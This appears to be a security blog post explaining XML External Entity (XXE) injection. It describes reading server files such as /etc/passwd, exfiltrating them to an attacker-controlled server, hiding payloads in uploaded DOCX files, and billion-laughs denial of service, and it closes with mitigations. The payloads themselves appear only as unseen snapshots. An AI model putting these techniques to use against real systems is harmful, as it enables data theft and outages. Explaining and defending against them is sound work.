Web / Mobile Applications, Word Processors , Web Services, and Content Management Platforms use the Extensible Markup Language (XML) format to store and transport data between the systems that are in both human-readable and machine-readable formats. If the input from the XML data is not properly validated, it could leave you vulnerable to many attack possibilities, such as SQL Injection, Cross Site Scripting, Server Side Request Forgery, Local File Read, Denial of Service, and (the hero of this post) XML External Entity (XXE) injection attack. This blog focuses on different attack scenarios using XXE injection attacks.
WHAT IS AN XXE?
An XML External Entity (XXE) injection is a serious flaw that allows an attacker to read local files on the server, access internal networks, scan internal ports, or execute commands on a remote server. It targets applications that parse XMLs.
This attack occurs when an XML input containing references to an external entity is processed by a weakly configured XML parser. The attacker takes advantage of it by embedding malicious inline DOCTYPE definition in the XML data. When the web server processes the malicious XML input, the entities are expanded, which results in potentially gaining access to a web server’s file system, remote file system access, or establishing connections to arbitrary hosts over HTTP/HTTPS.
EXAMPLE ATTACK SCENARIOS
- Local file hijack from server
- Access Server files through File Upload functionality
- DOS attack with Recursive Entity Expansion
Attack Scenario 1 : Local File Hijack from Server
When the attacker sends the malformed XML payload in the request, the server processes this payload and sends back a response with sensitive information, such as local files of the server, application configuration files, internal network details and so on.
In few cases upon submitting the HTTP request with the crafted XXE payload, the server responded with the /etc/passwd/ of the server.
Snapshot 1 : HTTP Request with a malicious INLINE DOCTYPE definition – with the corresponding response
However, in many cases, the server may not send back a response. The other way an attacker can exploit this is by including the URL (attacker-controlled server) in the XXE payload. When the server parses the payload, it makes an additional call to the attacker-controlled server, thereby an attacker listens to the victim’s server and captures information such as local files, server configuration files, and other server details.
The following images (Snapshot 2 & 3) shows that a URL is included in XXE payload. Upon submitting the HTTP request, the server makes an additional call to attacker-controlled server. Therefore the attacker listens to the request from the victim system and captures the server details (/etc/passwd/)
Snapshot 2 : HTTP Request containing the attack controlled URL
Snapshot 3 : Victim’s server makes an additional call to attacker’s server
Attack Scenario 2 : Access Server files through a File Upload feature
Many applications support a “File Upload” functionality (XLSX, DOCX, PPTX, SVG or any XML MIME type formats) for further processing. Usually, these files have an XML MIME type. An attacker could take advantage of the inherent XML type and upload malicious files embedded with XXE payloads. When the server parses the file, the file containing XXE payload gets executed, resulting in the disclosure of sensitive information of a server on the client side.
Note that the libraries that parse XML on one part of the site (e.g. API) may not be the same as libraries that parse uploaded files.
Snapshot 4 : Embedding XXE payload into the Docx file.Docx (just like pptx and xlsx) are essentially Open XML (OXML) files.
Snapshot 5 : Upload the malicious docx file to the (example) application
Snapshot 6 : Upon file submission, the server responds with sensitive information of the server /etc/passwd
Attack Scenario 3: DOS attack with Recursive Entity Expansion
This attack is also called as the Billion Laugh attack, the XML Bomb or a Recursive Entity Expansion attack. This attack occurs when the parser continually expands each entity within itself, which overloads the server and results in bringing down the server.
From the snapshot below, we see that when the parser starts parsing the XML file, initially “&lol9;” is referenced to entity “lol9” to get the value, but “lol9” itself has again references to “lol8” entity. Like one entity has references to ten entities and those ten entities are again referenced to other entities. This way, when the parser expands the entities, the utilisation of CPU increases extensively and thus causes the server to crash and become unresponsive.
XXE is not a new vulnerability but rather an existing one that has gained more notoriety in recent applications. A successful XXE attack could result in massive damages on both security and business functionality fronts. Few ways to deter XXE attacks include.
- Disable external entities. When required, only allow restricted and trusted external links
- Turn off entity expansion in XML
- Double check if the version of XML libraries used are vulnerable to XXE.
- Validate user-supplied input for External / Internal entities and INLINE DOCTYPE definitions prior to parsing